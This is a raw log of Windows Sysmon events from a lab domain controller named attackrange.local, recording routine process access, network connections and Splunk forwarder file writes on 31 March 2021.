12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.050{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.655{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB658915D1FEFE57BFC8B65F230A6206,SHA256=4487C0C022CF541C473FB4D338D970153C023D9C799BF38AD26F2584484FAAB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.655{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AEF85C924CADACD198C2D00D4E27A5F,SHA256=B843ED9DEFA57CB524D004BDEBD826888579D6229781246A0952775AFF8FA0B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.390{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F7E8E4D74D3699C2B13A60D97FA61C2,SHA256=3A57922EDBB9C27C74729D55B158F3167A8496EA115A0B19CA0F65517D589144,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000007427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.247{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53586-false20.190.151.69-443https 354300x80000000000000007426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.153{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63949- 10341000x80000000000000007452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.948{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000007446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.885{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.885{266CAFBE-64C4-6064-9B00-00000000AE01}49246164C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x80000000000000007444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.403{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A4374D4F4236D41AB7230E18412BCBE,SHA256=C95EA70AAA2B7CE7447CD79BABD2FF5F6B737CEEDA6F8D86A01018FAB88B2B1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000007443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:34.022{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53588-false52.177.166.224-443https 354300x80000000000000007442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.919{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61060- 354300x80000000000000007441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.367{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53587-false93.184.220.29-80http 10341000x80000000000000007440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.200{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.200{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-64DB-6064-B800-00000000AE01}6436C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.169{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:35.169{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 